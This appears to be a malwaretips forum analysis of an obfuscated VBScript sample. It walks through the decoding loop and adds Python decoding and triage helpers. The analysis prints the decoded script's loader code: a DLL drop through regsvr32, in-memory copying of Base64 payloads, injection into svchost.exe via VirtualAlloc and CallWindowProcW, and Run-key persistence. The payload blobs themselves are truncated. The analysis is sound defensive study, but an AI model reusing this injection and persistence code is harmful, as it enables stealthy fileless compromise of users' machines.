- May 14, 2016
- 1,597
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende
Why this sample ?
It's easy to deobfuscate the first part, but the real part is very interesting : a DLL and a file-less (memory-only) malware are inside the script :
=> DynamicWrapperX, for the DLL function calls (Win32 API from VBScript)
=> a loader copied into memory
=> a malware binary part copied into memory
=> injection into the targeted host process
2/52 detections when posting : Antivirus scan for f0c6e212714e5fa40f38b67d5f59e3afefbd322da1bca2a429f9bb9cb1e0ffdc at 2016-10-19 15:42:57 UTC - VirusTotal
VBScript
1) what it looks like :
'ÿæñ$%ý#å.ý"æèö(ì!êþç&#)%åõêó.+ï/ìðë-ÿ%øýð/
dim SUNVBCGETVG ',ë-ö"þ!ëûÿýòÿå(û)ü#÷ûö'ëåïûú"// ðõ&./#ë-ýì
'êêý+êîþêù*óþð),öç!í'û+. þ+'òê..ôô.-/ò!ðì ñ)&ÿ.#èøêïþú'ø(ëü
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
'ìèûçò(è.(÷æ#ì&/ëêîú!îííèö'ïýû#ê&ïúò"÷&ð"/'ù
'õüêìôñþ/úúöêúÿ!ü'ýñ÷ö#&'ö/&.øïý-$ûþçñìû.íþ&()ó&$ëü'! "+
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!èó#æ ì$&%ýùý(ú*þþý( ('øæõ-í/ø%íå(íÿ íé,èè)'%é",
'ü(ñ&îíú(üó ì!()ôû ñö!ýèû""&÷öõ%"øêù$"øõ'õöñ,ùéêóð$ë#ú
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC) '÷ç÷%-î%ò),ê-ì+,òðöûýóóôþú(òú*ö.êùï/êþü./øéêéð!"/å+éôù*î
'%þíæ(!çæ$ë-éð&*$ìöøçó*!+óúýù÷óððéü+ê(þí+%íçé
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
'ÿ'÷ê#"!û÷÷ç ""þïóè"æý ö*ú.ê)-óõ.&+òæ%&#,+ô'÷ø.ÿ(ðõ)ñ& .!õê.æôå"ê/ý÷.çÿ.*,ùú-
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) 'øï(üð" ïüÿ,$ê ïïê ù"öæö& *"#!èæ÷öêó÷î/åñ,&í%òôù(+.$/í,ìý&ìçõ
'üý%ùò,-&ìó.ï-ö&#ýù*ñ/%(,ûïýðþ÷ö*#ï/ü("õøòé+
BSBPIFYBTESIP = BSBPIFYBTESIP + 21 '$æíü÷óñ%"ÿï-+-ý)õþ.õýýèó!íæ#úî ïýöô÷!ð%
'*ø î.-*/éì),ïñ+ñ$*$éç ü!éíðö!åì-åæòîõ&þö.õó"øî++"$ñ%'íî÷
Next 'ìö-î÷%íí(ç-ý-é÷êóé!è#ïúìëè*#
'çí$+,ô-þï#ê/$æ+øíôú%'ýõðôè&ü"íòí-
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH 'èø/#ëó+çõìø&,ôôú ó÷éì!"#üóðö+.(ùþ-èå
'%úÿûòë#-é((ÿ#þ#ìñöñ)ùå-êþ**øëìñóùõî õ/ çñúù* %ë%(ðõííýüç'!&å%ç/ë#ðî
End Function '&$îç%÷*î+øÿ'%*.ëû$ûúèíèûê ëö#+ëæñùüé
'/+/þ!ó#éôýì.ô#$/ù,ýøæðÿÿíðÿï/(ÿì
2) Deobfuscation :
2-1 ) Quick clean :
A lot of lines use the comment char ' followed by useless chars.
I cleaned it ; here is the obfuscated script without the fake comment parts :
dim SUNVBCGETVG
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...=> 1.651.672 chars on the string !
...
"
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG))
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
Next
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function
2-2 ) How it works :
SUNVBCGETVG :
=> A very long string with the real content, obfuscated.
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) :
=> CLHHFSRSPXGUHEQJ(SUNVBCGETVG) : calls the function with the obfuscated string as parameter
=> Execute : evaluates the result (runs the returned string as VBScript code)
Let's understand the function.
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
Next
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function
A FOR loop is used, from index 1 (len("-")) to the length of the obfuscated string (replace(x,"","") returns x unchanged : it is just noise).
In the loop :
- Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3) :
=> retrieves 3 chars of the obfuscated string, from the current index, and replace(...,"-","") deletes the "-" occurrences
- CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) :
=> appends to a string (empty at the beginning) the char obtained with a char-code-to-char technique :
Chr(YHRDSIPKZK) : the parameter is a string that represents a decimal number ; it is used as a character code and Chr gives the corresponding char
- BSBPIFYBTESIP = BSBPIFYBTESIP + 21 :
=> index = index + 21, and Next adds 1 more, so the index really moves by 22 at each turn : every char code sits in a 22-char slot ("13" + 20 "-"), and reading 3 chars at the start of each slot also works for 3-digit codes like "101"
Example :
Result = ""
index : 1
retrieves "13-"
=> "13"
Result = Result & Chr("13") => in VBScript & is the concatenation
Result = "\r" => carriage return
index = index + 21 = 22, then Next => 23
Next loop:
Result = "\r"
index : 23
retrieves "10-"
=> "10"
Result = Result & Chr("10") => 10 : ASCII for newline : "\n"
Result = "\r\n"
index = index + 21 = 44, then Next => 45
Next loop:
Result = "\r\n"
index : 45
retrieves "39-"
=> "39"
Result = Result & Chr("39") => 39 : ASCII for ' (try ALT+39)
Result = "\r\n'"
index = index + 21 = 66, then Next => 67
Etc,..
At the end, it returns a String with the real bad content, and this string is Executed.
2-3 ) Conclusion for the obfuscation used and Malware part :
Only decimal ASCII codes in one long string, each padded with "--------" ; the decoded string is then run with Execute.
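The same decoder in Python, as an added example (my code, not the author's or the sample's). Since the real 1.651.672-char SUNVBCGETVG string is not on this page, the block also carries a constructed inverse encoder to build test input. guess_slot measures the slot width from the first "digits + dashes" run instead of hard-coding 22, so it also decodes a variant that changed the padding.

```python
"""Decoder for the first obfuscation layer (added example, not from the post).

Each character of the real script is stored as its decimal char code,
left-aligned in a fixed-width slot padded with "-" ("13" + 20 dashes = 22
chars). The VBScript reads 3 chars at the slot start, deletes the dashes,
converts with Chr, then adds 21 to the index; Next adds 1 more, so the
effective stride is 22 = one slot.
"""
import re

SLOT = 22   # measured on the sample: len("13") + 20 padding dashes


def guess_slot(blob):
    """Width of the first slot: the leading digits plus the dashes after them."""
    m = re.match(r"\d+-+", blob)
    if not m:
        raise ValueError("blob does not start with <digits><dashes>")
    return m.end()


def decode_layer1(blob, slot=None):
    """Port of CLHHFSRSPXGUHEQJ with 0-based indexing (VBScript Mid is 1-based)."""
    slot = slot or guess_slot(blob)
    out = []
    for i in range(0, len(blob), slot):          # one slot per iteration
        code = blob[i:i + 3].replace("-", "")    # "13-" -> "13", "101" -> "101"
        if not code.isdigit():
            raise ValueError(f"bad slot at offset {i}: {blob[i:i + 3]!r}")
        out.append(chr(int(code)))               # Chr(code)
    return "".join(out)


def encode_layer1(text, slot=SLOT):
    """Inverse of the decoder (constructed, not in the sample), used to build test input."""
    return "".join(str(ord(c)).ljust(slot, "-") for c in text)


if __name__ == "__main__":
    # Constructed payload; the real blob is the huge SUNVBCGETVG string.
    demo = encode_layer1("Dim x\r\n' comment\r\nx = 1\r\n")
    print(demo[:66])
    print(decode_layer1(demo))
```

Run it on the real sample by reading the SUNVBCGETVG literal out of the script and passing it to decode_layer1; the result is the "Real Content" shown in the next part.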
Real Content :
I cut a lot of the strings that contain long data, to protect you and to avoid too many lines
'=-=-=-=-= CONFIG =-=-=-=
HOST_FILE = "system32\Svchost.exe"
FILE_NAME = "injector.vbs"
INSTALL_DIR = "%temp%"
START_UP_REG = false
START_UP_TASK = false
START_UP_FOLDER = false
COMMAND_LINE = ""
'=-=-=-=-= CONFIG =-=-=-=
ON ERROR RESUME NEXT
'=-=-=-=-= GLOBAL =-=-=-=
SET FILESYSTEMOBJ = CREATEOBJECT ("SCRIPTING.FILESYSTEMOBJECT")
SET SHELLOBJ = WSCRIPT.CREATEOBJECT ("WSCRIPT.SHELL")
DIM I
'=-=-=-=-= GLOBAL =-=-=-=
'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI" & _
...
...
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
LOADER_DATA = _
"VYvsg8T4U1ZXi30Mi3UIjV38M8BVaP9QQABk/zBkiSDolwcAAIkDiwMFIAEAAFDoEAIAAFDo" & _
"LgIAAFDonAIAAIsTiYIcAQAAiwMFLAIAAFDo7wEAAFCLAwUcAgAAUIsD/5AcAQAAUOhwAgAA" & _
...
...
"AAAAAAAAVmlydHVhbEFsbG9jRXgAAAAAAABWaXJ0dWFsQWxsb2MAAAAAAAAAAFZpcnR1YWxG" & _
"cmVlAAAAAABUZXJtaW5hdGVQcm9jZXNzAAAAAAAAAABHZXRDb21tYW5kTGluZVcAbnRkbGwu" & _
"ZGxsAAAAAAAAAE50VW5tYXBWaWV3T2ZTZWN0aW9uAAAAAA=="
DIM FILE_DATA(10)
FILE_DATA (0) = "r8dBsj08fFQn9bEppowJqKQHJrby/RIW7UaFku4LEGf4AGbYizwN0CQeOrAjwuv08bsyfCU2yWTFw3RfHafgwrZJmhQ1HHVMR9ji2mB2jgjUOz4mWPkU/w58jQ7lL/ixLVXN4cl9yKpyqgBKVrb4LSOI2VVyZ318+qWpkTw4aH16920...
...
HcQ1BqnApX2fk5AuAIf4nh4r5sE1hK5nbe4YJiNrNkyw8CaQqklC5B/r3PkAtdd6mCH6xZOkZ9ZBD8dnxcca91UvxnLuhFtv7cphTajYg=="
FILE_DATA (1) = "twmMywo8/w6GRCk3AFQlOcwH8F53ufKnkayKaBgBKwcAQaYPiFbAFN34Gny6IBCP3xN3E7ZwtIajKPaY4ocVNxRvZAAPhw+xvxuA3Mz0EwpXT/TlreVWiVtWo2xV/wQ9Je/CJD53J+3yCHojmE1FVJUCHXY49JinZBPxNEoeG7YV
...
...
3yyxqzBxUPhsnt4jBLo/7QC+Q+YhWLhkA3P4hSa8NksKQpi+6A1y4BhGKNaVGR7fM/OKMH1cgQ39DS2bnmZtzPlFidmAPh9Anb3UqjGuWT2mIX/2BQ5O7FNI1GAQSpS4Ww+lTxzYJi1YfMhuMQmkdgESlcGOUB0LhCa9fDhL3AR2w=="
FILE_DATA (2) = "glOqrreb+sKq4EjO5ArP9e94gBR1Q+jgOA7Oks+WQ/Zd41US7ZoBG2C6Vj3HN2tgxm7y7oElRnn0yXTFPfBW+OX9dVyQh2rB1XOpuIKiaZjTC98S+2iTkajGVPOrLqnQBGxKgEOKBDKNGVDzMX+g1SYgTJHjdYdreANAWh3oOn5HMS....
...
PT4jyMg37rx8qR8W1v8ttPrlBSqE5AG+V6N+bO592gBWbgcKznqn0wKf8bm5cMb5vUjv3/X5QOmeE5aspAIvKty9PZPESKFGyKt4I29BtVkqND6WtMqvttvQuwgjAtakxNoXyscAhVArCuxmB+wew0PEMuMvvz2INbh9J/lYOlwlrWJjOg=="
FILE_DATA (3) = "WxZwRHaSiMHGatFfQfM3JAaR8jDoAmkneR8b7mhlK+8iKwZgtfZX+tOAstB0L2RRYQBKFvD8Jm62Tmz32uIaVYHWv.DFXaqI5ixYKgUMlmeUTz/L8QIMHu33XqmzsseXFxLO9qHNNuXc48oiKqCTr69ZbdeTENYJJ1Nen/0WS6BBHt...
...
tVhs+TTZZKdQD1457k/2YQLgleCkfvYrgiocw11+GRzgDVno+7gioC9oTGHgoNPO+vh9kAHNNDT/AJwpjnUmd9zxZalXAP3ATs39B0vr4uIrOGOH2/wfnXTRMw7E5o/mGZ4L0EYn6UP17hmOQ5EBsMC0XY7gOk1zxvzsSMRzVAE1HsdMDilcO6GyworcYacAO+feZT1tjFa11t8AU2NivZlfbWoWrQ=="
FILE_DATA (4) = "ZzO6bAUjg6JsyDZemhj37xWh0B6iozPBBi438JzKgSXUlMF0/X9W6h3zBSUoYmDsbHpvGKPfCkBJVgEb+7TLLPnqo+1G0EkO/NlKy7tvgqA8jvAjFAwVvtoIMCCCYh63rCPRnK6P8xjuUCunYppuPTw9yAnizPP2fU8YPD2R9SXQfhzgXC...
...
99OTNPfnpwYrfjefeHNyfYSXUS6Vd2DpB3GewfOCx5jvyTCMXqW/OaU4vYK3sH9MvZOuAt0gimvyL/7HNU4Ocia0eHbe2aKPpkKzVBDzWVwFtFzPEFnBZSrHN0hvw=="
FILE_DATA (5) = "MJNqIdZ1uXStpejnW5CpqDgtnby/vIUOEyh95BhKhc+By5XMH43OhaoQ8DaS/jo1tCyPl2EiMN2HRaLZg7lbjd6b6ic6o.sqhIAmubRGtJ5emVmLxH3avnaiiepZbz+39urg//3TBLlUOGe2j7E03Zubs9e8PywkfpASWjqknNnP1G9KEHg...
...
McJoX08PLHa+QHqh5hSUr54hVadQftCdbcCmTF9vBsdUm6R9IqGYa3AolZ4mFYOnveLcxfDOVOOyWY5xsLlOOGud1y8RJG2aXoQ7MRm1eo5kIHUsDCR9dVem+ArOow=="
FILE_DATA (6) = "x4fzHD8BvenVSFZuBvNL9YJmBjYdSkKDtbtzCek9LJEBw8tVwHEQnSi95n91HnK6AohNfNlPef7njeIpUZQbshBtVipYuo2h5Z+DY7FhVHFjNoh/RSV8chen6q6mds6h0ZkatwnARYUOPMP34hSG44pxellgtramKOFOenOLivA3/bkIiz....
...
Dp58PTJtZOl5yzuTlGdA5F/u9hgZTszlo8/Bbut7NL01rOWFGbZOa1nITRJyy5L/7ruVEALeiymQOzy+LDzaU5ZTc7/Utgfm+VQ7HX54UKfdQjLmLD1DBZTiKEztNcJ5HIYNIW53yaXQ0KZNCA=="
FILE_DATA (7) = "V7YaHTaF8+ho4vZz9FpWiy2/uJV18nQ9hx1ERmGqgMn51Y3YavcBBADiIe33FOYxhGJxmu8zAlCVJizhpCepw4tmpikDkrJnVUhG60VwMrvY2rySeiFhGyOl75bjH+GXlo4Jx1GtEfz0jwAKoEGUgBnXU9i5veroF50DjmGk1oMyrHAF....
...
tCig4hbSu/ZBNpmwrMm14QycNecqJXb+KcyERChxqslnyQ9DeZGu4ODhYTeY+L1uVfQQCJ7yxFHeLA0h5eD4sLsPzQqosnj8ezF58VU/LHsZZNCtWgExr0X+MtdW/CMPVAb+pDynmi3tUpYZRyg=="
FILE_DATA (8) = "6DGvTSwA7nUrhI66OqmEElJTbMPU3DyR6FVnyTbh6gj56u954fvPcxLS197EJOr1BXYSebRNKSAj/TbdqizPsEqLd18m.tFORl5CCLvioHzPKgoAQbbRuPYhz3F+fIg7x4w4nIL2agbubZ/taz6EHRNTdpOOxukKzS7+PvP3IlnJRzyeEncZ...
...
7Rvus5Eq1NxZwGlJwkwPhu5PoSk5dnZ5rrPUdcP0KwFOAK5t+a3PHgLYuzGIQIUItrV2HOrM0fU2ZgPHkcjyQmELUrkpBz7sFHo/KrzI24jmnzhVpLV/TGIESZni7ViJHtw=="
FILE_DATA (9) = ""
FILE_SIZE = 35328
'=-=-=-=-= CONSTO =-=-=-=
'=-=-=-=-= MYCODE =-=-=-=
START
FIX_WOW64
DCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\" & FILE_NAME & ".BIN"
IF NOT IS_DOTNET THEN
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%" & "\" & HOST_FILE)
ELSE
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%")&"\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSBUILD.EXE"
END IF
WRITE_FILE DCOM_NAME,TEXTTOBINARY(DCOM_DATA, "BIN.BASE64")
DO
SHELLOBJ.RUN "REGSVR32.EXE /I /S "& CHR(34)&DCOM_NAME& CHR(34),0,TRUE
SET DCOM = CREATEOBJECT("DYNAMICWRAPPERX")
WSCRIPT.SLEEP 1000
LOOP UNTIL ISOBJECT(DCOM)
DCOM.REGISTER "USER32.DLL", "CallWindowProcW",LCASE("I=PHULL"), LCASE("R=U")
DCOM.REGISTER "KERNEL32.DLL", "VirtualAlloc",LCASE("I=PUUU"), LCASE("R=P")
LOADER_DATA = BASE64TOHEX (LOADER_DATA)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FILE_DATA(I) = BASE64TOHEX (FILE_DATA(I))
NEXT
LOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(LOADER_DATA)/2,4096,64)
FOR I = 1 TO LEN (LOADER_DATA) STEP 2
CHAR = ASC(CHR("&H"&MID (LOADER_DATA,I,2)))
DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2
NEXT
COUNT = 0
PE_PTR = DCOM.VIRTUALALLOC (0,FILE_SIZE+1,4096,64)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FOR X = 1 TO LEN (FILE_DATA(I)) STEP 2
CHAR = ASC(CHR("&H"&MID (FILE_DATA(I),X,2)))
DCOM.NUMPUT EVAL(CHAR),PE_PTR,COUNT
COUNT = COUNT + 1
NEXT
NEXT
DCOM.CALLWINDOWPROCW LOADER_PTR,PE_PTR,DCOM.STRPTR (HOST_FILE),DCOM.STRPTR (COMMAND_LINE),0
SUB FIX_WOW64
SET OBJWMISERVICE = GETOBJECT ("WINMGMTS:\\.\ROOT\CIMV2")
SET COLITEMS = OBJWMISERVICE.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
FOR EACH OBJITEM IN COLITEMS
    SYSTEMTYPE = OBJITEM.SYSTEMTYPE
NEXT
IF (UCASE(SYSTEMTYPE) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
SHELLOBJ.RUN SHELLOBJ.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE //b //e:vbscript "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
WSCRIPT.QUIT
END IF
END SUB
SUB START ()
IF START_UP_REG = TRUE THEN
START_F = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\" & FILE_NAME
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,START_F ,TRUE
SHELLOBJ.REGWRITE "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & FILE_NAME,"WScript.exe //b //e:vbscript " & CHRW(34) & START_F & CHRW(34) ,"REG_SZ"
END IF
IF START_UP_FOLDER = TRUE THEN
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,SHELLOBJ.SPECIALFOLDERS ("STARTUP") & "\" & FILE_NAME & ".vbs" ,TRUE
END IF
IF START_UP_TASK = TRUE THEN
END IF
END SUB
FUNCTION BINARYTOTEXT (BINARY, DATATYPE)
DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = BINARY
DOM.DOCUMENTELEMENT.REMOVEATTRIBUTE(LCASE("DTT"))
BINARYTOTEXT = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION
FUNCTION TEXTTOBINARY (TEXT, DATATYPE)
DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = TEXT
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
TEXTTOBINARY = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION
FUNCTION BASE64TOHEX(STRBASE64)
BASE64TOHEX = BINARYTOTEXT(TEXTTOBINARY(STRBASE64, "BIN.BASE64"), "BIN.HEX")
END FUNCTION
FUNCTION WRITE_FILE (FILE_NAME,FILE_DATA)
IF FILESYSTEMOBJ.FILEEXISTS (FILE_NAME) THEN EXIT FUNCTION
CONST ADTYPEBINARY = 1
SET BINARYSTREAM = CREATEOBJECT("ADODB.STREAM")
BINARYSTREAM.TYPE = ADTYPEBINARY
BINARYSTREAM.OPEN
BINARYSTREAM.WRITE FILE_DATA
BINARYSTREAM.SAVETOFILE FILE_NAME
SET BINARYSTREAM = NOTHING
END FUNCTION
3) Explanation of the real content :
All parts are in UPPERCASE, and I really think it hurts the eyes.
So, in the parts below, I converted everything to lowercase (to avoid going blind ...)
3-1) Config / global data :
Here are important data that will be used later, and that help the script to make decisions (some value tests) :
'=-=-=-=-= CONFIG =-=-=-=
host_file = "system32\svchost.exe"
file_name = "injector.vbs"
install_dir = "%temp%"
start_up_reg = false
start_up_task = false
start_up_folder = false
command_line = ""
'=-=-=-=-= config =-=-=-=
on error resume next
'=-=-=-=-= global =-=-=-=
set filesystemobj = createobject ("scripting.filesystemobject")
set shellobj = wscript.createobject ("wscript.shell")
dim i
We can already see some well-known parts (if you have already followed some of my posts) :
=> "on error resume next" : every runtime error is silently ignored, so the script keeps going even when a step fails
=> two objects are created, one to manipulate files, the other for shell purposes (run commands, expand environment variables, write the registry)
3-2) Constant objects :
'=-=-=-=-= CONSTO =-=-=-=
dcom_data = .....
loader_data = .....
dim file_data(10)
file_data (0) = ....
file_data (1) = ....
...
file_data (9) = ....
file_size = 35328
Several (very long) Base64-encoded strings are used.
We will see later that :
dcom_data => DLL content (the component that allows the API calls)
loader_data => encoded loader code
file_data => array of encoded strings : the malware parts ; file_size (35328) is the size of the buffer allocated for them
loader_data and file_data will be decoded and used for the injection
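To check those claims without running the sample, here is an added triage helper (my code, not the author's or the sample's). It does in Python what base64tohex and the two NUMPUT loops do: Base64 text to raw bytes, file_data parts concatenated in index order, then a look at the MZ/PE header of the dropped DLL. The two DCOM_DATA lines and the first 8 Base64 chars of LOADER_DATA inside SAMPLE_SCRIPT are the real ones quoted in the decoded script above; everything after them is cut on the page, so the rest of LOADER_DATA, FILE_DATA and FILE_SIZE in the sample are constructed stand-ins.

```python
"""Pull the Base64 constants out of the decoded CONSTO block and check what they are.

Added example, not part of the post. Mirrors BASE64TOHEX (Base64 -> bytes) and
the NUMPUT loops (FILE_DATA parts appended in order), then parses the MZ/PE
header of DCOM_DATA to see what kind of file is dropped as injector.vbs.bin.
"""
import base64
import hashlib
import re
import struct

START_RE = re.compile(r'^\s*(\w+)\s*=\s*_\s*$')                                # NAME = _
CONT_RE = re.compile(r'^\s*"([A-Za-z0-9+/=]*)"\s*(&\s*_)?\s*$')                 # "...." & _
ARRAY_RE = re.compile(r'^\s*(\w+)\s*\((\d+)\)\s*=\s*"([A-Za-z0-9+/=]*)"\s*$')   # NAME (n) = "..."
SIZE_RE = re.compile(r'^\s*FILE_SIZE\s*=\s*(\d+)\s*$', re.I)


def extract_constants(script):
    """Return (scalar blobs, array blobs, FILE_SIZE) found in the decoded script text."""
    scalars, arrays, size = {}, {}, None
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        m = START_RE.match(lines[i])
        if m:                       # multi-line constant: collect until a line without "& _"
            name, parts = m.group(1).upper(), []
            i += 1
            while i < len(lines):
                c = CONT_RE.match(lines[i])
                if not c:
                    break
                parts.append(c.group(1))
                i += 1
                if not c.group(2):
                    break
            scalars[name] = "".join(parts)
            continue
        m = SIZE_RE.match(lines[i])
        if m:
            size = int(m.group(1))
        m = ARRAY_RE.match(lines[i])
        if m:
            arrays.setdefault(m.group(1).upper(), {})[int(m.group(2))] = m.group(3)
        i += 1
    return scalars, arrays, size


def decode_blob(scalars, name):
    """What TEXTTOBINARY(x, "bin.base64") returns: the raw bytes."""
    return base64.b64decode(scalars[name])


def assemble_file_data(arrays, file_size=None):
    """Same order as FOR I = 0 TO UBOUND(FILE_DATA)-1: decode each part and append."""
    parts = arrays.get("FILE_DATA", {})
    buf = b"".join(base64.b64decode(parts[k]) for k in sorted(parts))
    if file_size is not None and len(buf) != file_size:
        raise ValueError(f"reassembled {len(buf)} bytes but FILE_SIZE = {file_size}")
    return buf


def pe_summary(data):
    """Minimal MZ/PE header parse: enough to tell the architecture of a dropped file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, stamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": nsections,
            "timestamp": stamp, "is_32bit": machine == 0x14C,   # IMAGE_FILE_MACHINE_I386
            "sha256": hashlib.sha256(data).hexdigest()}


# Constructed stand-in for the decoded script (see the lead-in for what is real).
SAMPLE_SCRIPT = '''
'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI"
LOADER_DATA = _
"VYvs" & _
"g8T4"
DIM FILE_DATA(3)
FILE_DATA (0) = "TVqQAAMAAAAE"
FILE_DATA (1) = "AAAA//8AAA=="
FILE_DATA (2) = ""
FILE_SIZE = 16
'''


def triage(script=SAMPLE_SCRIPT):
    scalars, arrays, size = extract_constants(script)
    dll = decode_blob(scalars, "DCOM_DATA")
    loader = decode_blob(scalars, "LOADER_DATA")
    return {"dll": pe_summary(dll), "dll_len": len(dll),
            "loader_head": loader.hex(),
            "payload_len": len(assemble_file_data(arrays, size))}


if __name__ == "__main__":
    print(triage())
```

On the two real lines the header already tells the story: a DOS stub saying "Win32 Program!", a "GoLink, GoAsm" linker string, and Machine = 0x14C (i386), so the dropped component is a 32-bit DLL; the loader begins with 55 8B EC 83 C4 F8, a plain 32-bit function prologue. Both facts are why the script goes out of its way to re-launch itself under the 32-bit wscript.exe (see fix_wow64 below).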
3-3) Some functions :
binarytotext
texttobinary
base64tohex
write_file
For the data conversions, the functions use a MICROSOFT.XMLDOM object.
Example :
function textToBinary (text, datatype)
dim dom
set dom = CreateObject("MICROSOFT.XMLDOM")
dom.loadXML("<HELLO/>")
dom.documentElement.nodeTypedValue = text
dom.documentElement.dataType = dataType
textToBinary= dom.documentElement.nodeTypedValue
end function
Here, using a DOM object, the conversion is very easy : the text is stored in the node, the node's dataType is set to "bin.base64" (or "bin.hex"), and reading nodeTypedValue back gives the decoded bytes. base64tohex chains the two functions : Base64 text -> bytes -> hex text.
function write_file (file_name,file_data)
if fileSystemObj.fileExists (file_name) then exit function
const adTypeBinary = 1
set binarystream = createobject("adodb.stream")
binarystream.type = adtypebinary
binarystream.open
binarystream.write file_data
binarystream.saveToFile file_name
set binarystream= nothing
end function
It uses the fileSystemObject created in the global data part (see 3-1) ) to check that the file doesn't already exist, then an adodb.stream object to create the file on disk, with the path and the data as parameters.
In VB, a Function can return a value, a Sub doesn't (there are other differences, but they are not important here).
3-4 ) How it works :
'=-=-=-=-= MYCODE =-=-=-=
start
=> calls a sub that does its job (or not) according to the Boolean values below :
start_up_reg
start_up_task
start_up_folder
sub start ()
if start_up_reg = true then
=> it modifies the registry (HKCU Run key) so that a copy of the script runs at each logon
start_f = shellobj.expandenvironmentstrings (install_dir) & "\" & file_name
filesystemobj.copyfile wscript.scriptfullname,start_f ,true
shellobj.regwrite "hkey_current_user\software\microsoft\windows\currentversion\run\" & file_name,"wscript.exe //b //e:vbscript " & chrw(34) & start_f & chrw(34) ,"reg_sz"
end if
if start_up_folder = true then
=> it puts a copy of the script in the startup folder
filesystemobj.copyfile wscript.scriptfullname,shellobj.specialfolders ("startup") & "\" & file_name & ".vbs" ,true
end if
if start_up_task = true then
=> empty part
end if
end sub
In the current script :
start_up_reg = false
start_up_task = false
start_up_folder = false
=> the start sub does nothing (no persistence in this build, but the code is ready for it)
sub fix_wow64
